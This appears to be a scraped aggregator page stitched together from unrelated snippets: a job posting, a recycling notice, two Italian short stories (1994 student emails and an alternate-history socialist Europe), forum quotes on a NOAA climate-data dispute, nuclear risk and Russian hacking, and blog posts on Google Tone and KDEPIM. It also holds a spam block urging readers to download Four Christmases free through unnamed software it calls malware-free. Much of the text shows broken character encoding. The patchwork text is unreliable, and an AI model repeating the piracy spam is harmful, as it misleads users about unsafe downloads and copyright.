|Comment on Supreme Commander 2 Free Download by lordethe2cnd 16||does this app add any viruses to your computer|
|Part-Time Human Resources Development Instructor (Continuing Education)||NC-Wilmington, Definition: Teach employability soft skills as they relate to current computer technology and trends vital to the existing job market. Provide classroom instruction to college students through lecture, demonstration, laboratory exercises, handouts, responding to questions and testing for employability purposes. DISTINGUISHING CHARACTERISTICS: Employees within this class are distinguished from the |
|Watch and Download FOUR CHRISTMASES - Movie|
Download Movie Four Christmases
" stop Searching & Start Downloading Four Christmases Full Length Watch online or Download Four Christmases movie for free."
Hello, listen closely as I describe to you one of the best ways to download Four Christmases and dvd quality movies for free. It's actually very easy, with this highly rated software you will literally download Four Christmases to your desktop free. You can then take Four Christmases and write it on either a audio and dvd disc fast and easy.
Also if you download Four Christmases on a monthly basis then you are seriously getting ripped off. If you go out to the movie theaters and paying to watch full movies such as Four Christmases then you are spending money on what millions of people literally download and watch for free.
Now when choosing a movie downloading software, it is imperative that you choose the right movie software. With so many of viruses , spyware and adware infected movie sites on the internet today, who love nothing better then to steal surfers personal data . Why risk the chance downloading Four Christmases , or any other movie from one of these potentially computer harming sites. With your new software you can instantly download movies safe without malware and adware being downloaded to your desktop.
Download Four Christmases Complete Movie Free!!!
|Beaufort County computer recycle events set||BEAUFORT, S.C (OS) â The next Beaufort County Public Works Department Solid Waste and Recycling Office free electronics recycling events for county residents will be held from 9 a.m. to 3 p.m. at the following locations on Dec. 5: Beaufort County Public Works, 9 Benton Field Road, Bluffton Beaufort County Public Works, 140 Shanklin Road, […]|
From: "scrittore della domenica" <email@example.com>
To: "lorenzo" <Lrnz73@unipi.it>
Date sent: Mon, 14 Feb 1994 12:09:05
Mannaggia a te! Che c'era di male nelle lettere cartacee? SignornÃ². "Dai, mandami un'e-mail! E' facile, divertente, vedrai!". - Intanto ho dovuto iscrivermi al laboratorio d'informatica di questa cavolo di universitÃ , dove bisogna fare domanda in carta bollata anche per un caffÃ¨ al bar. Poi, io il computer manco lo so usare. A quest'ora dovrei essere in sala studio a preparare l'esame di diritto privato comparato (capirai); invece sto qua ad arrovellarmi con tastiera e mouse.
Va beh. Ti scrivo per questo: devi assolutamente registrarmi un po' di cassette di musica rock. Hai presente? Quella che tu hai sempre detto che io la snobbo. Specialmente, quanto piÃ¹ progressive anni '70 riesci a procurarmi. Non so, gli Yes, i Genesis, i King Crimson, quella roba lÃ . E poi il grunge. Non i Nirvana, chÃ© onestamente non li reggo: Smashing Pumpkins, Pearl Jam, Soundgarden. E magari della musica da discoteca, perÃ² di un certo livello. E ci sarebbe un pezzo di un gruppo inglese che mi ossessiona, si chiama... ce l'ho sulla punta della lingua. Basta, appena mi ricordo il titolo te lo dico.
No, non sono impazzito. E' che ho conosciuto una ragazza molto simpatica che ha questi gusti musicali. Anche molto bella, a dire la veritÃ . Anzi, la sola cosa che le vorrei dire Ã¨ proprio questa: che la trovo bellissima. Ma, tu mi conosci; non c'Ã¨ verso; se provo ad affrontare l'argomento, ammutolisco senza rimedio. CosÃ¬ mi servono urgentemente altri argomenti di conversazione. Lei studia inglese, e fin qui posso arrangiarmi. L'ho anche accompagnata a lezione, ho studiato i suoi appunti. Sai? Sto diventando, credo, il massimo esperto di T. S. Eliot di tutto il basso Ionio reggino. Quest'estate, se non altro, potrÃ² esibirmi nei locali sul lungomare recitando The Waste Land a memoria.
Ma tutto questo non basta. Prima o poi dovrÃ² trovare il coraggio di invitarla a uscire una sera, che so, ad un concerto, o addirittura (non ridere) a ballare. PerchÃ© ho capito che alle matinÃ©e in Conservatorio lei non ci viene. Ebbene, Ã¨ qui che subentri tu. Devi aiutarmi ad andare oltre Beethoven. Ripeto, procurami del rock, perchÃ© mi serve come il pane!
Attendo tue notizie, stammi bene.
P.S. Mi sono ricordato il titolo di quella canzone: Creep, dei Radiohead.
From: "scrittore della domenica" <firstname.lastname@example.org>
To: "lorenzo" <Lrnz73@unipi.it>
Date sent: Mon, 21 Mar 1994 15:31:22
Subject: Re: Re: Eccomi
Grandi novitÃ ! Abbiamo occupato. Ora la nostra casa dello studente Ã¨ Pensionato Universitario Occupato Autogestito. L'abbiamo deciso venerdÃ¬ sera, al termine di un'agitata assemblea sugli ultimi aumenti delle rette e della mensa. Io mi sono aggiudicato la gran parte dei turni di notte in portineria: sia per evitare i turni di pulizia, sia perchÃ© mi piace fare le ore piccole e perchÃ© durante l'occupazione c'Ã¨ un bel clima. Si parla, si beve, si fuma tabacco e non solo: effettivamente, non sto studiando granchÃ©. PerÃ² mi diverto.
Ieri, per esempio, verso la mezzanotte la situazione comprendeva una bottiglia di mirto, uno stereo, sei-sette persone fra cui Alice (la ragazza di cui ti ho parlato nella mia ultima lettera) e me. Il guaio Ã¨ che dopo un'oretta loro sono usciti, per andare credo in discoteca, mentre io dovevo rimanere per continuare il turno; ma mi hanno lasciato la bottiglia, d'altronde semivuota, e lo stereo. O forse due bottiglie e due sterei, a quel punto non capivo piÃ¹ bene. Sono riuscito, in qualche modo, a togliere la cassetta dei Rage Against The Machine e a mettere su il Lamento d'Arianna di Monteverdi, che in quel momento era anche piÃ¹ adatto.
A proposito: mi hai registrato le cassette che ti ho chiesto? Se scendi anche tu in Calabria per le elezioni, tra una settimana me le puoi dare. Ma l'hai visto quel pagliaccio miliardario? E pensa che magari qualcuno lo voterÃ anche. Viviamo in un paese meraviglioso.
From: "scrittore della domenica" <email@example.com>
To: "lorenzo" <Lrnz73@unipi.it>
Date sent: Fri, 15 Apr 1994, 16:05:30
Subject: buona notte al secchio
La sai una cosa? Tre anni fa, dopo il diploma, commisi un solo errore.
Allo sportello della stazione chiesi un biglietto per Milano. Sbagliai: avrei dovuto comprare un sola andata per Londra, o per Parigi, o per Berlino.
L'occupazione Ã¨ finita. L'Ente per il Diritto allo Studio ha promesso che, col nuovo bilancio, ben il 3,75% delle risorse aggiuntive sarÃ stanziato per porre rimedio ai recenti rincari delle tariffe, compatibilmente con il principio del pareggio contabile.
Insomma: non abbiamo ottenuto un bel niente.
Ho saputo che Alice si Ã¨ fidanzata. Con uno studente d'ingegneria, milanese da varie generazioni e di ottima famiglia, buon giocatore dilettante di basket. Ha una macchina svedese con doppia alimentazione, benzina verde e gas, perchÃ© bisogna proteggere l'ambiente. Un bravissimo ragazzo.
Tutto Ã¨ perduto. Mentre questa ridicola nazione, consegnatasi ancora volontaria nelle mani di un tirannello squilibrato, si avvia verso il suo triste destino, io ti comunico la mia irrevocabile decisione.
Pongo rimedio al mio errore.
E basta, con queste e-mail del piffero! Ti farÃ² avere prossimamente il mio nuovo recapito estero.
La sai un'altra cosa? Siamese Dream degli Smashing Pumpkins Ã¨ molto piÃ¹ noioso della piÃ¹ tediosa sinfonia di Bruckner.
From: "scrittore della domenica" <firstname.lastname@example.org>
To: "lorenzo" <Lrnz73@unipi.it>
Date sent: Tue, 26 Apr 1994 16:28:43
E niente: all'estero non sono andato.
Ti spiego cos'Ã¨ successo.
Sai che mi Ã¨ sempre piaciuto stare sveglio fino a tardi; ultimamente sto esagerando; mi succede spesso di fare l'alba. Da un po' non scendo neanche piÃ¹ in sala studio, per non rischiare d'incontrare Alice. La sera me ne sto tappato in camera, ascoltando Brahms.
Un mio consiglio per i giovani: se abitate in una casa dello studente, cercate di non innamorarvi mai di un'altra persona ospite del pensionato. Soprattutto se non corrisposti.
Bene: domenica notte, mentre studiavo, ho messo su il Tristano. CosÃ¬, tanto per cambiare. Ma, poco dopo il preludio, ho dovuto spegnere.
Frisch weht der Wind
Der Heimat zu
Mein Irisch Kind,
Wo weilest du?
Mi si Ã¨ annebbiata la vista, e ho scoperto che avevo finito i kleenex. Ho chiuso il libro. Mi sono alzato dalla sedia e sono andato a lavarmi il viso con l'acqua fredda. Poi sono tornato alla scrivania.
Ho acceso il quinto canale della radio (quello che trasmette solo classica). C'era un brano di avanguardia; una cosa che non conoscevo, una specie di collage sonoro sul tipo di Revolution 9 dei Beatles, hai presente? Folle in tumulto, suoni strani, rumori ambientali, nastri in loop, voci umane che declamano sillabe incomprensibili. Un delirio.
Roba forte! Ho attaccato lo spinotto delle cuffie alla radio e mi sono sparato il brano nelle orecchie, chiudendo gli occhi e reclinando indietro la testa. A un certo punto, dal tappeto sonoro ha cominciato a emergere una voce femminile, che sembrava pronunciare un testo coerente. Dapprima si sentiva sullo sfondo, e non si capiva bene cosa dicesse; qualcosa sul Vietnam. Man mano, la voce diventava sempre piÃ¹ forte, piÃ¹ netta, e veniva sempre piÃ¹ in primo piano. Alla fine, con una presenza sonora impressionante, la voce scandiva, anzi no scolpiva, queste parole: "Rimanete qui, e combattete per la vostra dignitÃ di uomini".
"Avete ascoltato: Luigi Nono, Contrappunto dialettico alla mente", ha detto l'annunciatore.
Ho staccato lo spinotto, ho tolto le cuffie e ho spento la radio.
Ho riconsiderato la mia intenzione di espatriare. Ho pensato: ma non l'ho giÃ fatto? Sono giÃ emigrato. E prima di me mio padre, proprio negli anni in cui Nono componeva quel pezzo.
Quante volte ancora voglio fare le valigie?
Possibile che l'unica soluzione sia quella di scappare sempre piÃ¹ lontano?
L'indomani, 25 aprile, sono andato alla manifestazione. Il concentramento era alle due del pomeriggio; ma mi sono svegliato cosÃ¬ tardi che non ho potuto neanche fare colazione. Ho preso un caffÃ¨ al distributore automatico giÃ¹ in atrio e sono uscito, in direzione porta Venezia.
Era previsto un corteo molto grande. E' stato immenso. Mai vista tanta gente tutta insieme! E che varietÃ , quanti colori, che musiche, che allegria! Quanta pioggia, anche: veniva giÃ¹ a secchiate, per tutta la durata della manifestazione.
Io ero in fondo al corteo, e pensa che non sono neppure riuscito a entrare in piazza Duomo, tanto era gremita! Ho svoltato per piazza Fontana, poi per via Larga. Ho vagato per un pezzo; non so chi o cosa mi aspettassi di trovare, a parte qualcosa da mettere sotto i denti, dato che avevo una fame da lupo.
Mi sono ritrovato, non so come, in piazza Sant'Alessandro, vicino alla facoltÃ di lingue, che naturalmente era chiusa; c'era perÃ² un bar-tavola calda miracolosamente aperto; mi ci sono fiondato dentro.
Ero seduto sul mio sgabello, dando le spalle all'ingresso, e divoravo la mia pizzetta, ovviamente pessima come solo a Milano la sanno fare, quando mi Ã¨ parso di vedere una sorta di variazione nella luce. Come se avesse improvvisamente smesso di piovere e fosse uscito un sole splendente.
Mi giro, e vedo Alice entrare nel locale e raggiungermi.
Era in tenuta da manifestazione: jeans sdruciti, camicia grunge, niente make-up (lei che di solito Ã¨ cosÃ¬ curata). I lunghi capelli biondi inumiditi dalla pioggia, che intanto continuava a scrosciare.
"Ciao", le dico. "Dov'Ã¨ il tuo fidanzato?"
"Sciocco", mi ha risposto. "Oggi ci sono cose piÃ¹ importanti", ha detto. "C'Ã¨ mezza casa dello studente qui fuori: abbiamo fatto uno striscione molto figo, lo andiamo ad attaccare al portone dell'I.S.U. Cosa fai qua, solo come un gufo? Vieni anche tu!"
Non me lo sono fatto dire due volte.
E dunque. Fra un mese ho l'esame di diritto sindacale. Materia interessante, sai? Credo che chiederÃ² la tesi.
Per ora rimango qui.
(Racconto giÃ pubblicato su Evulon. Ogni riferimento a fatti, persone, cittÃ , eventi, uomini politici, bar e pizzette della realtÃ Ã¨ puramente casuale).
|Stella rossa sull'Europa||"Buongiorno, Anne. Buon anno".|
"Buongiorno, Valentin. Buon anno anche a te. NovitÃ ?"
"SÃ¬. Un nuovo arrivo. Sabato notte. Hai il colloquio giÃ fissato per le undici. Trovi tutti i dettagli in agenda".
Anne Dupont, psicologa del Centro di Prima Accoglienza di Calais, entrÃ² nel suo ufficio, accese il terminale e consultÃ² la sua agenda elettronica.
LunedÃ¬ 5 gennaio 2011, ore 11,00. Colloquio con Monsieur Philip Brasser. Cittadino britannico. EtÃ 38. Celibe. Operazione di salvataggio in mare, Canale della Manica, acque internazionali, 3 gennaio u.s. Condizioni fisiche buone. Non parla francese. Attribuzione provvisoria: codice blu.
Bene, pensÃ² Anne. Un rifugiato politico. Iniziare l'anno nuovo con un codice blu era di buon auspicio. Il colloquio era di lÃ¬ a due ore. Non c'erano altri impegni per la giornata. CompletÃ² con calma alcuni referti clinici iniziati la settimana precedente, fece una partita a Tetris, chattÃ² con alcuni amici in Internet. Quando fu il momento, si aggiustÃ² il make-up e si recÃ² in sala colloqui.
Era una stanza non troppo ampia, arredata come un normale studio specialistico ma con qualche accorgimento per mettere gli ospiti a proprio agio: colori pastello, luci soffuse, lettino basso, comoda poltrona. Su quest'ultima, di fronte alla scrivania della dottoressa, era giÃ seduto il signor Brasser.
"Good morning, Mr. Brasser. Prima di tutto, come sta?"
La domanda non era solo formale. L'uomo appariva molto provato. I tanti capelli bianchi, la pelle del viso magro solcata da numerose rughe, le profonde occhiaie dietro le lenti spesse, lo facevano sembrare piÃ¹ vecchio di dieci anni rispetto alla sua etÃ anagrafica. Al posto degli abiti che indossava al momento del suo salvataggio, fradici e inservibili, gli avevano fornito un nuovo completo, che era tuttavia di due numeri piÃ¹ largo e accentuava la gracilitÃ del suo fisico. Gli tremavano le mani.
Quegli scafisti maledetti, pensÃ² Anne.
"Adesso sto meglio, grazie. Certo, suppongo che la notte passata all'addiaccio su quel canotto non abbia migliorato granchÃ© la mia cera. Ma ho fatto una buona dormita, qui da voi, e la vostra cucina Ã¨ ottima". La sua voce era ferma, con una sfumatura d'ironia. "Solamente, non sono riuscito a procurarmi neppure una sigaretta, dottoressa..."
"Dupont. Ma puÃ² chiamarmi Anne. Temo che non ne troverÃ neppure in futuro. Nell'Unione non se ne producono piÃ¹. Fino a qualche tempo fa, le importavamo dal suo paese".
"Oh, giÃ , ora ricordo. Le esportazioni cessarono sei anni fa. Troppo pochi fumatori, qui da voi. Non c'era abbastanza profitto. Lo so perchÃ© all'epoca lavoravo in un'agenzia di rating".
"Lei Ã¨ analista finanziario?"
Il signor Brasser rise. "No. Laureato in agraria. Da Troody's ero operatore al call center. Ogni grande compagnia ha il suo. E' la mansione che ho sempre svolto, durante tutta la mia carriera. Ho lavorato per almeno trenta societÃ diverse, ogni volta per non piÃ¹ di sei mesi. Si imparano tante cose, sa?"
"Non ho dubbi. Ma veniamo al punto. Lei ha chiesto lo status di rifugiato politico. Data la sua provenienza, certamente la sua richiesta sarÃ accettata. Lei diventerÃ fra breve, a tutti gli effetti, cittadino dell'Unione delle Repubbliche Socialiste d'Europa. GiÃ adesso, comunque, lei Ã¨ libero di circolare in tutto il territorio dell'Unione, ed eventualmente anche di tornare da dove Ã¨ venuto..."
"No grazie! Non ci tengo affatto".
"Dicevo per dire. In genere, qui da noi i rifugiati si integrano abbastanza in fretta. Tuttavia, non si puÃ² escludere che, all'inizio, lei si trovi un po' spaesato. Il nostro sistema sociale Ã¨ molto diverso da quello da cui lei proviene. A sua richiesta, lei puÃ² fruire di adeguata assistenza psicologica e culturale, per superare eventuali difficoltÃ di adattamento. In questa fase iniziale, se vuole, mi consideri pure come suo referente".
"Oh. E quanto dura questa... fase iniziale?"
"PuÃ² finire anche subito, se crede. L'unico suo obbligo, se intende rimanere nell'Unione, Ã¨ di iscriversi nelle liste di collocamento e nelle graduatorie per gli alloggi. Non credo che le sarÃ difficile trovare un lavoro e una casa. Se lei non ha esigenze particolari, penso che troverÃ una sistemazione accettabile nel giro di un paio di settimane. Fino ad allora, comunque, puÃ² rimanere qui, o spostarsi in una delle altre strutture di prima accoglienza nel territorio dell'Unione".
"Sembra magnifico. Dov'Ã¨ la fregatura?"
"Ecco. Era proprio ciÃ² che intendevo. Non c'Ã¨ nessuna fregatura, per quanto lei sia abituato a pensare che debba per forza esserci. Non pretendo che lei mi creda. Presto se ne accorgerÃ da sÃ©".
Non c'erano straordinari da fare, quel giorno. Alle tredici, Anne spense il computer, salutÃ² i colleghi che arrivavano per il turno pomeridiano e, senza passare dalla mensa, prese l'elio-tram che, serpeggiando silenziosamente lungo la costa, la portÃ² a casa sua in dieci minuti. Era una magnifica giornata di sole. Il mare era inusualmente calmo, in quei giorni. Una fortuna, per Brasser. Aveva evitato il triste destino di tanti boat-people che partivano clandestinamente dalla riva inglese ma non riuscivano a raggiungere i nostri mezzi di soccorso nelle acque internazionali.
Anne abitava da sola. Si preparÃ² un leggero pranzo macrobiotico, poi un caffÃ© d'orzo. Accese la radio; la spense. Si guardÃ² nello specchio del soggiorno. Sorrise. Tutto sommato, si piaceva. Si chiese come sarebbe stato il suo sembiante, alla sua etÃ , se anzichÃ© in Europa continentale fosse vissuta in quell'inferno che doveva essere Londra. I profughi le avevano raccontato storie orribili. Inquinamento, degrado. Se andava bene, orari lavorativi di dieci o dodici ore. Altrimenti, la disoccupazione, l'emarginazione e la pazzia. Oppure, per una ristretta minoranza, la ricchezza e il potere, ma a costo di rinunciare a qualsiasi barlume d'umanitÃ . Un'altra forma di follia, in fondo.
MercoledÃ¬ 7 gennaio, ore 10,00. Secondo colloquio con Monsieur Brasser.
Quella mattina l'aspetto di Mr. Brasser era molto migliorato. Anne glielo disse.
"Grazie, Dottoressa. Lei Ã¨ gentile quanto bella".
Anne Dupont ignorÃ² il complimento.
"Se ho chiesto un nuovo colloquio" continuÃ² Brasser, "non Ã¨ per ottenere assistenza psicologica".
"Davvero? E perchÃ©, allora?"
"Ho due domande da porle".
"Le risponderÃ², se posso. Ma prima, permetta che le faccia io una domanda. Cosa sa, lei, dell'Unione?"
"Poco, in realtÃ . So che dapprima ci fu la Rivoluzione d'Ottobre, in Russia, nel 1917. Poi, tra il '18 e il '20, il capitalismo fu abbattuto in Germania, in Ungheria e in Italia. In rapida successione, tutte le colonie europee in Asia e in Africa conquistarono l'indipendenza. L'India nel 1925, la Cina nel '27, e cosÃ¬ via. Poco dopo fu la volta dell'Algeria e del Marocco, e a quel punto la rivoluzione scoppiÃ² anche in Francia e in Spagna. Alla fine degli anni '30, tutta l'Europa continentale era socialista.
Frattanto, il crollo di Wall Street nel 1929 aveva gettato l'America nella crisi piÃ¹ nera. Le elezioni presidenziali del 1940 furono vinte da Charles Lindbergh, un fanatico antisemita che instaurÃ² negli U.S.A. una dittatura razzista, appoggiata dal grande capitale. Presto quel regime si circondÃ² di una serie di stati-satellite che coprivano tutta l'America del Sud e del Nord.
Negli anni '80, quelle dittature iniziarono ad implodere, dapprima in America Latina e poi in Canada. Quando nel 1989 cadde il Muro di Tijuana, finalmente il capitalismo crollÃ² negli stessi Stati Uniti. Da allora, secondo la nostra propaganda, il Regno Unito di Gran Bretagna Ã¨ rimasto l'ultimo baluardo del libero mercato e della civiltÃ , contro la barbarie socialista che ha travolto tutto il resto del globo. Questo Ã¨ quanto".
"Bene - disse la dottoressa - a parte la faccenda del baluardo, il quadro storico Ã¨ corretto. Non le sarÃ stato facile ricostruirlo..."
"No, infatti. Da noi, formalmente, la cultura Ã¨ libera, e ognuno puÃ² leggere ciÃ² che vuole. Si possono prendere in prestito, nelle poche biblioteche rimaste, anche testi di Marx o di Lenin, e persino di Fabio Volo. Non Ã¨ vietato. Di fatto, perÃ², ci sono materie che non conviene approfondire troppo. Se si viene a sapere che lei fa certe letture e che ha determinate idee (e si viene a sapere sempre), non speri di trovare lavoro tanto facilmente. Io me la sono cavata con i call center, solo perchÃ© le mie origini non sono troppo umili. Quando avevo vent'anni, i miei riuscirono persino a mandarmi all'universitÃ . Certo, oggi non potrei piÃ¹ frequentarla. Da allora le rette sono decuplicate."
"Ah, lei ha letto Fabio Volo? Complimenti. Da noi, molti lo considerano un autore troppo difficile".
"SÃ¬, Ã¨ molto rigoroso e denso, ma se si ha tempo da dedicargli, Ã¨ un pensatore affascinante. Le consiglio la Critica del tempo unidimensionale, se non l'ha ancora letta. A me ha aperto la mente. In realtÃ , uno dei motivi per cui mi sono deciso ad espatriare Ã¨ che anche studiare per conto proprio da noi Ã¨ diventato impossibile. Troppo costoso, da quando il dizionario Ã¨ stato privatizzato".
"SÃ¬. Tutti i sostantivi che iniziano per vocale appartengono alla Mircosoft. Quelli che iniziano per consonante sono del gruppo Murdogh. Gli avverbi sono di Merdaset, e cosÃ¬ via. Per leggere o per usare comunque le parole bisogna pagare il noleggio ai legittimi proprietari. Quando lei scrive una e-mail, oppure quando chatta o quando telefona, un sistema di contatori automatici calcola la cifra e l'addebita sul suo conto. Ottimo sistema, fra l'altro, per controllare i contenuti della comunicazione. Io, per esempio, ho fatto quindici giorni di carcere per uso illecito di marchio registrato, la volta che in una mia mail ho scritto che la Cocca Colla mi faceva schifo".
"Senta, Mr. Brasser. Quali sono i suoi progetti? Cosa intende fare, ora che Ã¨ venuto qui da noi?"
"Primo, togliermi una curiositÃ che mi ha tormentato a lungo. Ed Ã¨ la prima delle due domande che volevo farle, si ricorda?"
La dottoressa Dupont sbuffÃ². "Va bene. Spari".
"La domanda Ã¨: perchÃ© non ci avete invaso? Come avete potuto lasciarci a mollo in quella fogna?"
Anne si appoggiÃ² sullo schienale della sedia. "Beh, alcuni partiti in seno all'Internazionale erano per dichiarare guerra. Ma infine prevalse l'idea che il socialismo non puÃ² essere imposto con i carri armati. Se ci avessero attaccato, ci saremmo difesi. Per fortuna non accadde. Oggi, poi, molti sostengono che una pluralitÃ di sistemi sociali diversi non Ã¨ necessariamente un male. In India, in Giappone e in Sud America, dove la transizione al comunismo Ã¨ molto avanzata, stanno giÃ smantellando le strutture dello Stato, per sostituirle con vari tipi di organizzazione non statuale. In Europa e in Africa ci troviamo ancora nella fase socialista, in vari stadi di sviluppo a seconda dei territori. Forse Ã¨ bene che ci siano delle zone dove ancora vige il capitalismo."
"SarÃ un bene per voi, che ci osservate dall'esterno come se fossimo allo zoo! Ma per noi che siamo in gabbia Ã¨ un altro discorso".
"Lei ora non Ã¨ piÃ¹ in gabbia. Comunque, mi sembra che il suo atteggiamento nei confronti del suo paese d'origine sia un po' troppo negativo, non crede?"
"Mi dica lei cosa ci vede di bello, in quel letamaio", ribattÃ© Brasser.
"Beh, che so... Avete una scena musicale molto vivace. Un sacco di gruppi pop, rock, punk, post-punk... Wim Wenders ci ha fatto anche un film. Poi, comunque, il vostro sistema ha ancora una base di consenso popolare".
"Si riferisce a West End London Social Club, vero? Quel film mi dÃ la nausea! Le televisioni del regime lo replicano senza tregua. L'unico film d'autore trasmesso in prima serata, e senza interruzioni pubblicitarie."
"Ecco, ad esempio - lo interruppe la dottoressa - PerchÃ© lei parla di televisioni di regime? Da voi ci sono sei o sette canali, se non sbaglio, tutti privati e in concorrenza fra loro..."
"... e trasmettono tutti le stesse schifezze. Non si distinguono l'uno dall'altro. Anne, lei non ha capito: da noi l'economia Ã¨ allo sfascio, la societÃ Ã¨ in piena decadenza, la cultura Ã¨ morta e sepolta. L'unica attivitÃ che va a gonfie vele Ã¨ la manipolazione del consenso per mezzo dei mass-media. Quella Ã¨ l'unica industria che non conosce crisi!"
"Non volevo farla arrabbiare. Si calmi. Lei ora Ã¨ al sicuro. AndrÃ tutto bene. Respiri profondamente, e mi faccia la seconda domanda che voleva pormi".
"Mi scusi. La domanda Ã¨ questa. Lei Ã¨ libera stasera? Ho letto sul giornale che in un cinema d'essai a Dunkerque proiettano L'Atalante di Jean Vigo. E' una vita che desidero vedere quel film, e mi chiedevo se... lei volesse venire con me a vederlo, ecco."
Pubblicato su Evulon in due puntate: la prima il 7 gennaio 2011 qui, e la seconda il 12 gennaio 2011, qui.
|Update (February 11, 2017) - '..ethical standards..' ('.. Dr. Bates appeared to distance himself from some of what he wrote in the blog post..') (no replies)|| |
Update February 11, 2017: 'In an interview on Monday with E&E News, Dr. Bates appeared to distance himself from some of what he wrote in the blog post, and from the way his criticisms were portrayed in the Mail on Sunday article.
Update February 09, 2017: 'Dr Batesâ main complaint is that Dr Karl and his co-authors did not follow strict procedures required for NOAAâs âoperationalâ data. It is not yet clear whether Dr Karl should have subjected his research data to the same procedures. Dr Karl, who retired from NOAA in August 2016, has not yet had the opportunity to respond fully to Dr Batesâ allegations.'
'..a failure to observe proper ethical standards..'
'Dr John Batesâs disclosures about the manipulation of data behind the âPausebusterâ paper is the biggest scientific scandal since âClimategateâ in 2009 when, as this paper reported, thousands of leaked emails revealed scientists were trying to block access to data, and using a âtrickâ to conceal embarrassing flaws in their claims about global warming.
'Whatever takes its place, said Dr Bates, âthere needs to be a fundamental change to the way NOAA deals with data so that people can check and validate scientific results. Iâm hoping that this will be a wake-up call to the climate science community â a signal that we have to put in place processes to make sure this kind of crap doesnât happen again.
Dr Bates said: âHow ironic it is that there is now this idea that Trump is going to trash climate data, when key decisions were earlier taken by someone whose responsibility it was to maintain its integrity â and failed.â '
'Dr Bates retired from NOAA at the end of last year after a 40-year career in meteorology and climate science. As recently as 2014, the Obama administration awarded him a special gold medal for his work in setting new, supposedly binding standards âto produce and preserve climate data recordsâ.
Context '..conduct more meetings on ethics .. Respectful discussion of different points of view should be encouraged.' - John Bates
Climategate: Follow the Money - By Bret Stephens
|'We have no experience in stopping a nuclear war.' - Sidney Drell (no replies)|| '..My greatest concern is the lack of public awareness about this existential threat, the absence of a vigorous public debate about the nuclear-war plans of Russia and the United States, the silent consent to the roughly fifteen thousand nuclear weapons in the world. These machines have been carefully and ingeniously designed to kill us. Complacency increases the odds that, some day, they will. The âTitanic Effectâ is a term used by software designers to explain how things can quietly go wrong in a complex technological system: the safer you assume the system to be, the more dangerous it is becoming.'|
'The harsh rhetoric on both sides increases the danger of miscalculations and mistakes, as do other factors. Close encounters between the military aircraft of the United States and Russia have become routine, creating the potential for an unintended conflict. Many of the nuclear-weapon systems on both sides are aging and obsolete. The personnel who operate those systems often suffer from poor morale and poor training. None of their senior officers has firsthand experience making decisions during an actual nuclear crisis. And todayâs command-and-control systems must contend with threats that barely existed during the Cold War: malware, spyware, worms, bugs, viruses, corrupted firmware, logic bombs, Trojan horses, and all the other modern tools of cyber warfare. The greatest danger is posed not by any technological innovation but by a dilemma that has haunted nuclear strategy since the first detonation of an atomic bomb: How do you prevent a nuclear attack while preserving the ability to launch one?
|(Bazaarmodel - To Heal - Teal) - '..is it possible to build a truly Evolutionary-Teal school?' (no replies)|| |
'This factory-like system seems increasingly out of date. More and more people are crying out for innovation in education and starting to experiment with curricula, technologies, and governance in schools. But is it possible to build a truly Evolutionary-Teal school? And what would it look like? A superb example can be found in the center of Berlin in Germany. The âESBZâ is a grade 7-12 school that opened its doors in 2007 with more than a bit of improvisation. Just three months before the start of the school year, the city council had suddenly given a decrepit prefabricated building from communist times to a group of pesky parents who simply wouldnât let go of their dream. When the school year started, only 16 students were registered. A few months later, at the mid-year point, 30 more students had joined, mostly rejects and troublemakers other schools had expelled. Hardly a promising start for a new school. And yet today, only a few years later, the school has 500 students and attracts hundreds of principals, teachers, and education specialists from all over the country who want to study the ESBZ model.'
'..Yet unlike Sudbury, Montessori or Steiner schools, Rasfeldâs institution tries to embed student self-determination within a relatively strict system of rules. Students who dawdle during lessons have to come into school on Saturday morning to catch up, a punishment known as âsilentiumâ. âThe more freedom you have, the more structure you need,â says Rasfeld.
The main reason why the ESBC is gaining a reputation as Germanyâs most exciting school is that its experimental philosophy has managed to deliver impressive results..'
'..At OberlÃ¤nderâs school, there are no grades until students turn 15, no timetables and no lecture-style instructions. The pupils decide which subjects they want to study for each lesson and when they want to take an exam.
(To Heal - Teal - Bazaarmodel) - Striving for wholeness '..We have let our busy egos trump the quiet voice of our soul; many cultures often celebrate the mind and neglect the body..'
|'..Russia .. cyberpower proved the perfect weapon .. political sabotage..' (no replies)|| ' âWeâd have all these circular meetings,â one senior State Department official said, âin which everyone agreed you had to push back at the Russians and push back hard. But it didnât happen.â|
Mr. Putin, a student of martial arts, had turned two institutions at the core of American democracy â political campaigns and independent media â to his own ends..
..The Russians clearly had a more sophisticated understanding of American politics, and they were masters of âkompromat,â their term for compromising information.
..the hackings of the State Department, the White House and the Pentagon..
What seems clear is that Russian hacking, given its success, is not going to stop. Two weeks ago, the German intelligence chief, Bruno Kahl, warned that Russia might target elections in Germany next year. âThe perpetrators have an interest to delegitimize the democratic process as such,â Mr. Kahl said. Now, he added, âEurope is in the focus of these attempts of disturbance, and Germany to a particularly great extent.â '
'..the White Houseâs reluctance to respond forcefully meant the Russians have not paid a heavy price for their actions, a decision that could prove critical in deterring future cyberattacks.
Context '[Russia] may become a threat to the world. That is the worst thing that could happen to Russia.' - Yegor Gaidar
'..Russian strategy of hybrid influence and destabilization .. German Council on Foreign Relations.'
|TOT/TDW and other peace corps acronyms||
Quiche dinner in the transit house
Those of us who are helping with training this summer/rainy season are in Yaounde this week and next for the TDW (Training Design Workshop) and TOT (Training of Trainers). Gabe and I are here designing the technical training sessions for the 5 incoming computer literacy trainees as well as working [...]|
|Chrome - Google Tone|
I continue to be impressed by the options for access that are being developed for the Chrome Web Browser. Google just released an experiment called Google Tone. The concept is that it will play a short tone that other computers can hear, and they will open the URL you shared. The extension must be installed on all the computers nearby (wish it worked on mobile devices!) and have access to the microphone. Just click the link in the toolbar and it sends out the "tone". You can install the extension here - g.co/tone and it works in Chrome for Mac, Windows and all Chromebook devices. Happy Sharing!
Do you know somebody else who would find this post interesting or useful? Please forward it to them. Did somebody forward this post to you? Visit Teaching All Students and subscribe to receive posts for free. If you need a RSS Reader please visit this post Google Reader Replacements.
|Three days in Berlin (or improving the pim user experience)|
Last weekend I've met with some of our old timer KDEPIM developers and some of the newer ones who are interested in KDEPIM or related technologies in the KDAB offices in Berlin.
Time passed, so we went out for dinner to a Greek restaurant at the corner. Nice place, third time being there, good food (seems Berlin has only good eating places). We even saw how Germany won over Ireland. Too bad Steveire (Stephen Kelly) was not there... We continued with some more talks and hacking, then everybody went to their sleeping places.
